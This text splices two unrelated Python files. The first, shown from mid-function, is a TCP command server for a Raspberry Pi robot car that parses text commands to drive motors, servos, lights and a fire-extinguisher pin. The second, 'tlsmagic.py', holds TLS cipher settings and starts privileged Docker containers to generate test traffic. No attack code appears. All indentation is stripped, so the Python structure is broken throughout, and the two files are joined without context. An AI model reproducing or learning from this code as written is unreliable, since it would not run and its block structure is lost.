#解析上位机发来的七彩探照灯指令并点亮相应的颜色
#如:$4WD,CLR255,CLG0,CLB0# 七彩灯亮红色
if (InputString.find("CLR", 0, len(InputString)) != -1):
i = InputString.find("CLR", 0, len(InputString))
ii = InputString.find(",CLG", 0, len(InputString))
if ii > i:
string = InputString[i+3:ii]
m_kp = int(string)
red = m_kp
i = InputString.find("CLG", 0, len(InputString))
ii = InputString.find(",CLB", 0, len(InputString))
if ii > i:
string = InputString[i+3:ii]
m_kp = int(string)
green = m_kp
i = InputString.find("CLB", 0, len(InputString))
ii = InputString.find("#", 0, len(InputString))
if ii > i:
string = InputString[i+3:ii]
m_kp = int(string)
blue = m_kp
color_led_pwm(red, green, blue)
NewLineReceived = 0
InputString.zfill(len(InputString))
#解析上位机发来的通用协议指令,并执行相应的动作
#如:$1,0,0,0,0,0,0,0,0,0# 小车前进
if (InputString.find("$4WD", 0, len(InputString)) == -1) and (InputString.find("#", 0, len(InputString)) != -1):
if InputString[3] == '1':
g_CarState = enTLEFT #小车原地左旋
elif InputString[3] == '2':
g_CarState = enTRIGHT #小车原地右旋
else:
g_CarState = enSTOP
if InputString[5] == '1':
whistle() #小车鸣笛
if InputString[7] == '1':
CarSpeedControl += 20
if CarSpeedControl > 100:
CarSpeedControl = 100 #小车加速
if InputString[7] == '2':
CarSpeedControl -= 20
if CarSpeedControl < 20: #小车减速
CarSpeedControl = 20
#小车点亮指定颜色
if InputString[13] == '1':
g_lednum=g_lednum+1
if g_lednum == 1:
color_led_pwm(255, 255, 255)
elif g_lednum == 2:
color_led_pwm(255, 0, 0)
elif g_lednum == 3:
color_led_pwm(0, 255, 0)
elif g_lednum == 4:
color_led_pwm(0, 0, 255)
elif g_lednum == 5:
color_led_pwm(255, 255, 0)
elif g_lednum == 6:
color_led_pwm(0, 255, 255)
elif g_lednum == 7:
color_led_pwm(255, 0, 255)
else :
color_led_pwm(0, 0 ,0)
g_lednum = 0
if InputString[13] == '2':
color_led_pwm(255, 0, 0)
if InputString[13] == '3':
color_led_pwm(0, 255, 0)
if InputString[13] == '4':
color_led_pwm(0, 0, 255)
#灭火
if InputString[15] == '1':
GPIO.output(OutfirePin,not GPIO.input(OutfirePin) )
time.sleep(1)
#前舵机归位
if InputString[17] == '1':
g_frontServoPos = 90
#小车状态数据解析
if g_CarState != enTLEFT and g_CarState != enTRIGHT:
if InputString[1] == run_car:
g_CarState = enRUN
elif InputString[1] == back_car:
g_CarState = enBACK
elif InputString[1] == left_car:
g_CarState = enLEFT
elif InputString[1] == right_car:
g_CarState = enRIGHT
elif InputString[1] == stop_car:
g_CarState = enSTOP
else:
g_CarState = enSTOP
#舵机状态数据解析
if InputString[9] == front_left_servo:
g_frontServoPos = 180
elif InputString[9] == front_right_servo:
g_frontServoPos = 0
elif InputString[9] == up_servo:
g_ServoState = enSERVOUP
elif InputString[9] == down_servo:
g_ServoState = enSERVODOWN
elif InputString[9] == left_servo:
g_ServoState = enSERVOLEFT
elif InputString[9] == right_servo:
g_ServoState = enSERVORIGHT
elif InputString[9] == updowninit_servo:
g_ServoState = enSERVOUPDOWNINIT
elif InputString[9] == stop_servo:
g_ServoState = enSERVOSTOP
else:
g_ServoState = enSERVOSTOP
NewLineReceived = 0
InputString.zfill(len(InputString))
#根据解析的数据让小车做出相应的运动
if g_CarState == enSTOP:
brake()
elif g_CarState == enRUN:
run()
elif g_CarState == enLEFT:
left()
elif g_CarState == enRIGHT:
right()
elif g_CarState == enBACK:
back()
elif g_CarState == enTLEFT:
spin_left()
elif g_CarState == enTRIGHT:
spin_right()
else:
brake()
#对Tcp传过来的数据封包
def Data_Pack():
global InputString
global NewLineReceived
if recvbuf[0] == '$' and recvbuf.find("#", 0, len(recvbuf)) != -1:
InputString = recvbuf
NewLineReceived = 1
print "InputString: %s" % InputString
#采集的传感器数据串口回发给上位机显示
def tcp_data_postback():
#小车超声波传感器采集的信息发给上位机显示
#打包格式如:
# 超声波 电压 灰度 巡线 红外避障 寻光
#$4WD,CSB120,PV8.3,GS214,LF1011,HW11,GM11#
global ReturnTemp
ReturnTemp = ''
distance = Distance_test()
ReturnTemp += "$4WD,CSB"
ReturnTemp += str(int(distance))
ReturnTemp += ",PV8.4"
ReturnTemp += ",GS0"
ReturnTemp += ",LF"
tracking_test()
ReturnTemp += infrared_track_value
ReturnTemp += ",HW"
infrared_avoid_test()
ReturnTemp += infrared_avoid_value
ReturnTemp += ",GM"
follow_light_test()
ReturnTemp += LDR_value
ReturnTemp += "#"
print "ReturnTemp: %s" % ReturnTemp
return ReturnTemp
#定义舵机控制线程
def ServorThread():
#舵机状态判断并执行相应的函数
global g_frontServoPos
global g_nowfrontPos
if g_ServoState == enSERVOUP:
servo_up()
elif g_ServoState == enSERVODOWN:
servo_down()
elif g_ServoState == enSERVOLEFT:
servo_left()
elif g_ServoState == enSERVORIGHT:
servo_right()
elif g_ServoState == enSERVOUPDOWNINIT:
servo_updown_init()
elif g_ServoState == enSERVOSTOP:
servo_stop()
if g_nowfrontPos != g_frontServoPos:
frontservo_appointed_detection(g_frontServoPos)
g_nowfrontPos = g_frontServoPos
pwm_FrontServo.ChangeDutyCycle(0) #归零信号
try:
init()
servo_init()
global g_ServoState
global timecount
global connectflag
connectflag = 0
timecount = 1000
count = 50
#通过socket创建监听套接字并设置为非阻塞模式
tcpservicesock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tcpservicesock.setblocking(0)
#填充绑定服务器的ip地址和端口号
#注意:这里一定要根据自己的树莓派的ip地址来填
tcpservicesock.bind(('192.168.0.1', 8888))
#监听客户端的连接
tcpservicesock.listen(5)
print "waiting for connection...."
#创建监听列表
clientAddrList = []
thread1 = threading.Thread(target = ServorThread)
thread1.start()
thread1.join()
while True:
try:
#准备接受客户端的连接并返回连接套接字
print "Start accept!"
tcpclientsock,addr = tcpservicesock.accept()
if tcpclientsock:
connectflag = 1
except:
pass
else:
print "new user :%s " % str(addr)
#设置连接套接字为非阻塞的模式并将连接的套接字放入到监听列表中
tcpclientsock.setblocking(0)
clientAddrList.append((tcpclientsock,addr))
for tcpclientsock,addr in clientAddrList:
try:
global recvbuf
global sendbuf
recvbuf = ''
#TCP接受数据
print "Start recv!"
recvbuf = tcpclientsock.recv(128)
print "Start recv over!"
except:
pass
else:
if len(recvbuf) > 0:
#数据打包
Data_Pack()
if NewLineReceived == 1:
#调用数据解析函数
tcp_data_parse()
else:
tcpclientsock.close()
clientAddrList.remove((tcpclientsock,addr))
#延时并调用传感器采集的数据回发客户端
timecount -= 1
if timecount == 0:
count -= 1
timecount = 1000
if count == 0:
sendbuf = ''
sendbuf = tcp_data_postback()
if not sendbuf:
break
if connectflag:
#采集数据给客户端
tcpclientsock.send(sendbuf)
timecount = 1000
count = 50
ServorThread()
except KeyboardInterrupt:
pass
tcpclientsock.close()
tcpservicesock.close()
pwm_ENA.stop()
pwm_ENB.stop()
pwm_rled.stop()
pwm_gled.stop()
pwm_bled.stop()
pwm_FrontServo.stop()
pwm_LeftRightServo.stop()
pwm_UpDownServo.stop()
GPIO.cleanup()
|
tlsmagic.py
|
__author__ = 'Shirish Pal'
import os
import subprocess
import sys
import argparse
import json
import jinja2
import time
from threading import Thread
import pdb
supported_ciphers = [
{'cipher_name' : 'AES128-SHA',
'cipher' : '{AES128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '10.2',
'server_ip_prefix' : '100.2'
},
{'cipher_name' : 'AES256-SHA',
'cipher' : '{AES256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '11.2',
'server_ip_prefix' : '101.2'
},
{'cipher_name' : 'DHE-RSA-AES128-SHA',
'cipher' : '{DHE-RSA-AES128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '12.2',
'server_ip_prefix' : '102.2'
},
{'cipher_name' : 'DHE-RSA-AES256-SHA',
'cipher' : '{DHE-RSA-AES256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '13.2',
'server_ip_prefix' : '103.2'
},
{'cipher_name' : 'DHE-RSA-AES128-GCM-SHA256',
'cipher' : '{DHE-RSA-AES128-GCM-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '14.2',
'server_ip_prefix' : '104.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES128-SHA',
'cipher' : '{ECDHE-ECDSA-AES128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '15.2',
'server_ip_prefix' : '105.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES256-SHA',
'cipher' : '{ECDHE-ECDSA-AES256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '16.2',
'server_ip_prefix' : '106.2'
},
{'cipher_name' : 'ECDHE-RSA-AES128-SHA',
'cipher' : '{ECDHE-RSA-AES128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '17.2',
'server_ip_prefix' : '107.2'
},
{'cipher_name' : 'ECDHE-RSA-AES256-SHA',
'cipher' : '{ECDHE-RSA-AES256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '18.2',
'server_ip_prefix' : '108.2'
},
{'cipher_name' : 'ECDHE-ECDSA-CHACHA20-POLY1305',
'cipher' : '{ECDHE-ECDSA-CHACHA20-POLY1305}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '19.2',
'server_ip_prefix' : '109.2'
},
{'cipher_name' : 'DHE-RSA-CHACHA20-POLY1305',
'cipher' : '{DHE-RSA-CHACHA20-POLY1305}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '20.2',
'server_ip_prefix' : '110.2'
},
{'cipher_name' : 'CAMELLIA128-SHA',
'cipher' : '{CAMELLIA128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '21.2',
'server_ip_prefix' : '111.2'
},
{'cipher_name' : 'CAMELLIA256-SHA',
'cipher' : '{CAMELLIA256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '22.2',
'server_ip_prefix' : '112.2'
},
{'cipher_name' : 'DHE-RSA-CAMELLIA128-SHA',
'cipher' : '{DHE-RSA-CAMELLIA128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '23.2',
'server_ip_prefix' : '113.2'
},
{'cipher_name' : 'DHE-RSA-CAMELLIA256-SHA',
'cipher' : '{DHE-RSA-CAMELLIA256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '24.2',
'server_ip_prefix' : '114.2'
},
{'cipher_name' : 'AES128-SHA256',
'cipher' : '{AES128-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '25.2',
'server_ip_prefix' : '115.2'
},
{'cipher_name' : 'AES256-SHA256',
'cipher' : '{AES256-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '26.2',
'server_ip_prefix' : '116.2'
},
{'cipher_name' : 'DHE-RSA-AES128-SHA256',
'cipher' : '{DHE-RSA-AES128-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '27.2',
'server_ip_prefix' : '117.2'
},
{'cipher_name' : 'AES128-GCM-SHA256',
'cipher' : '{AES128-GCM-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '28.2',
'server_ip_prefix' : '118.2'
},
{'cipher_name' : 'AES256-GCM-SHA384',
'cipher' : '{AES256-GCM-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '29.2',
'server_ip_prefix' : '119.2'
},
{'cipher_name' : 'ECDHE-RSA-AES128-GCM-SHA256',
'cipher' : '{ECDHE-RSA-AES128-GCM-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '30.2',
'server_ip_prefix' : '120.2'
},
{'cipher_name' : 'ECDHE-RSA-AES256-GCM-SHA384',
'cipher' : '{ECDHE-RSA-AES256-GCM-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '31.2',
'server_ip_prefix' : '121.2'
},
{'cipher_name' : 'ECDHE-RSA-AES128-SHA256',
'cipher' : '{ECDHE-RSA-AES128-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '32.2',
'server_ip_prefix' : '122.2'
},
{'cipher_name' : 'ECDHE-RSA-AES256-SHA384',
'cipher' : '{ECDHE-RSA-AES256-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '33.2',
'server_ip_prefix' : '123.2'
},
{'cipher_name' : 'DHE-RSA-AES256-SHA256',
'cipher' : '{DHE-RSA-AES256-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '34.2',
'server_ip_prefix' : '124.2'
},
{'cipher_name' : 'DHE-RSA-AES256-GCM-SHA384',
'cipher' : '{DHE-RSA-AES256-GCM-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '35.2',
'server_ip_prefix' : '125.2'
},
{'cipher_name' : 'ECDHE-RSA-CHACHA20-POLY1305',
'cipher' : '{ECDHE-RSA-CHACHA20-POLY1305}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '36.2',
'server_ip_prefix' : '126.2'
},
{'cipher_name' : 'TLS_AES_128_GCM_SHA256',
'cipher' : '{TLS_AES_128_GCM_SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : 0,
'tls1_3' : '{tls1_3}',
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '37.2',
'server_ip_prefix' : '139.2'
},
{'cipher_name' : 'TLS_AES_256_GCM_SHA384',
'cipher' : '{TLS_AES_256_GCM_SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : 0,
'tls1_3' : '{tls1_3}',
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '38.2',
'server_ip_prefix' : '128.2'
},
{'cipher_name' : 'TLS_CHACHA20_POLY1305_SHA256',
'cipher' : '{TLS_CHACHA20_POLY1305_SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : 0,
'tls1_3' : '{tls1_3}',
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '39.2',
'server_ip_prefix' : '129.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES128-GCM-SHA256',
'cipher' : '{ECDHE-ECDSA-AES128-GCM-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '40.2',
'server_ip_prefix' : '130.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES256-GCM-SHA384',
'cipher' : '{ECDHE-ECDSA-AES256-GCM-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '41.2',
'server_ip_prefix' : '131.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES128-SHA256',
'cipher' : '{ECDHE-ECDSA-AES128-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '42.2',
'server_ip_prefix' : '132.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES256-SHA384',
'cipher' : '{ECDHE-ECDSA-AES256-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '43.2',
'server_ip_prefix' : '133.2'
},
{'cipher_name' : 'RC4-MD5',
'cipher' : '{RC4-MD5}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '44.2',
'server_ip_prefix' : '134.2'
},
{'cipher_name' : 'RC4-SHA',
'cipher' : '{RC4-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '45.2',
'server_ip_prefix' : '135.2'
},
{'cipher_name' : 'DES-CBC-SHA',
'cipher' : '{DES-CBC-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '46.2',
'server_ip_prefix' : '136.2'
},
{'cipher_name' : 'DES-CBC3-SHA',
'cipher' : '{DES-CBC3-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '47.2',
'server_ip_prefix' : '137.2'
},
{'cipher_name' : 'SEED-SHA',
'cipher' : '{SEED-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '48.2',
'server_ip_prefix' : '138.2'}
]
def start_containers(host_info, c_args):
rundir_map = "--volume={}:{}".format (c_args.host_rundir
, c_args.target_rundir)
srcdir_map = "--volume={}:{}".format (c_args.host_srcdir
, c_args.target_srcdir)
for z_index in range(host_info['cores']):
zone_cname = "tp-zone-{}".format (z_index+1)
cmd_str = "sudo docker run --cap-add=SYS_PTRACE --security-opt seccomp=unconfined --network=bridge --privileged --name {} -it -d {} {} tlspack/tgen:latest /bin/bash".format (zone_cname, rundir_map, srcdir_map)
os.system (cmd_str)
for netdev in host_info['net_dev_list']:
cmd_str = "sudo ip link set dev {} up".format(netdev)
os.system (cmd_str)
cmd_str = "sudo docker network connect {} {}".format(host_info['net_macvlan_map'][netdev], zone_cname)
os.system (cmd_str)
def stop_containers(host_info, c_args):
for z_index in range(host_info['cores']):
zone_cname = "tp-zone-{}".format (z_index+1)
cmd_str = "sudo docker rm -f {}".format (zone_cname)
os.system (cmd_str)
def restart_containers(host_info, c_args):
stop_containers(host_info, c_args)
start_containers(host_info, c_args)
def add_common_params (arg_parser):
arg_parser.add_argument('--sysinit'
, action="store_true"
, default=False
, help = 'sysinit')
arg_parser.add_argument('--host_rundir'
, action="store"
, default='/root/rundir'
, help = 'rundir path')
arg_parser.add_argument('--target_rundir'
, action="store"
, default='/rundir'
, help = 'rundir path in container')
arg_parser.add_argument('--host_srcdir'
, action="store"
, default='/root/tcpdash'
, help = 'host_srcdir')
arg_parser.add_argument('--target_srcdir'
, action="store"
, default='/root/tcpdash'
, help = 'target_srcdir')
def add_common_start_params(arg_parser):
arg_parser.add_argument('--runtag'
, action="store"
, required=True
, help = 'run id')
def add_traffic_params (arg_parser):
add_common_params (arg_parser)
add_common_start_params (arg_parser)
arg_parser.add_argument('--na'
, action="store"
, required=True
, dest='na_iface'
, help = 'na_iface name')
arg_parser.add_argument('--nb'
, action="store"
, required=True
, dest='nb_iface'
, help = 'nb_iface name')
arg_parser.add_argument('--zones'
, action="store"
, type=int
, default=1
, help = 'zones ')
arg_parser.add_argument('--cps'
, action="store"
, type=int
, required=True
, help = 'tps : 1 - 10000')
arg_parser.add_argument('--max_pipeline'
, action="store"
, type=int
, default=100
, help = 'max_pipeline : 1 - 10000')
arg_parser.add_argument('--max_active'
, action="store"
, type=int
, default=100
, help = 'max_active : 1 - 2000000')
arg_parser.add_argument('--cipher'
, action="store"
, help = 'command name'
, required=True)
arg_parser.add_argument('--sslv3'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tls1'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tls1_1'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tls1_2'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tls1_3'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tcpdump'
, action="store"
, help = 'tcpdump options'
, default='-c 1000')
arg_parser.add_argument('--total_conn_count'
, action="store"
, type=int
, default=0
, help = 'total connection counts')
arg_parser.add_argument('--client_mac_seed'
, action="store"
, help = '5 bytes'
, default='02:42:ac:14:00')
arg_parser.add_argument('--server_mac_seed'
, action="store"
, help = '5 bytes'
, default='02:42:ac:15:00')
arg_parser.add_argument('--app_next_write'
, action="store"
, type=int
, default=0
, help = 'app_next_write')
arg_parser.add_argument('--app_cs_data_len'
, action="store"
, type=int
, default=128
, help = 'app_cs_data_len')
arg_parser.add_argument('--app_sc_data_len'
, action="store"
, type=int
, default=128
, help = 'app_sc_data_len')
arg_parser.add_argument('--app_rcv_buff'
, action="store"
, type=int
, default=0
, help = 'app_rcv_buff')
arg_parser.add_argument('--app_snd_buff'
, action="store"
, type=int
, default=0
, help = 'app_snd_buff')
arg_parser.add_argument('--tcp_rcv_buff'
, action="store"
, type=int
, default=0
, help = 'tcp_rcv_buff')
arg_parser.add_argument('--tcp_snd_buff'
, action="store"
, type=int
, default=0
, help = 'tcp_snd_buff')
arg_parser.add_argument('--app_cs_starttls_len'
, action="store"
, type=int
, default=0
, help = 'app_cs_starttls_len')
arg_parser.add_argument('--app_sc_starttls_len'
, action="store"
, type=int
, default=0
, help = 'app_sc_starttls_len')
arg_parser.add_argument('--port_begin'
, action="store"
, type=int
, default=5000
, help = 'app_sc_starttls_len')
def add_proxy_params (arg_parser):
add_common_params (arg_parser)
add_common_start_params (arg_parser)
arg_parser.add_argument('--proxy_traffic_vlan'
, action="store"
, type=int
, required=True
, help = '1-4095')
arg_parser.add_argument('--ta'
, action="store"
, required=True
, dest = 'ta_iface'
, help = 'ta host interface')
arg_parser.add_argument('--tb'
, action="store"
, required=True
, dest = 'tb_iface'
, help = 'tb host interface')
arg_parser.add_argument('--ta_macvlan'
, action="store"
, default=''
, help = 'ta host macvlan')
arg_parser.add_argument('--tb_macvlan'
, action="store"
, default=''
, help = 'tb host macvlan')
arg_parser.add_argument('--ta_iface_container'
, action="store"
, help = 'ta interface'
, default='eth1')
arg_parser.add_argument('--tb_iface_container'
, action="store"
, help = 'tb interface'
, default='eth2')
arg_parser.add_argument('--ta_subnet'
, action="store"
, help = 'ta subnet'
, required=True)
arg_parser.add_argument('--tb_subnet'
, action="store"
, help = 'tb subnet'
, required=True)
arg_parser.add_argument('--ta_tcpdump'
, action="store"
, help = 'ta tcpdump'
, default='-c 100')
arg_parser.add_argument('--tb_tcpdump'
, action="store"
, help = 'tb tcpdump'
, default='-c 100')
arg_parser.add_argument('--client_mac_seed'
, action="store"
, help = '5 bytes'
, default='02:42:ac:14:00')
arg_parser.add_argument('--server_mac_seed'
, action="store"
, help = '5 bytes'
, default='02:42:ac:15:00')
def add_stop_params (arg_parser):
add_common_params (arg_parser)
def add_status_params(arg_parser):
add_common_params (arg_parser)
def add_enter_params (arg_parser):
add_common_params (arg_parser)
def add_exit_params (arg_parser):
add_common_params (arg_parser)
def zone_start_thread(host_info, c_args, zone, z_index):
zone_cname = "tp-zone-{}".format (z_index+1)
cmd_str = "sudo docker exec -d {} ip netns add {}".format(zone_cname, host_info['netns'])
os.system (cmd_str)
for netdev in host_info['net_iface_map'].values():
cmd_str = "sudo docker exec -d {} ip link set dev {} netns {}".format(zone_cname,
netdev,
host_info['netns'])
os.system (cmd_str)
cmd_str = "sudo docker exec -d {} cp -f /rundir/bin/tlspack.exe /usr/local/bin".format(zone_cname)
os.system (cmd_str)
cmd_str = "sudo docker exec -d {} chmod +x /usr/local/bin/tlspack.exe".format(zone_cname)
os.system (cmd_str)
cmd_str = "sudo docker exec -d {} cp -f /rundir/bin/tlspack.py /usr/local/bin".format(zone_cname)
os.system (cmd_str)
cmd_str = "sudo docker exec -d {} chmod +x /usr/local/bin/tlspack.py".format(zone_cname)
os.system (cmd_str)
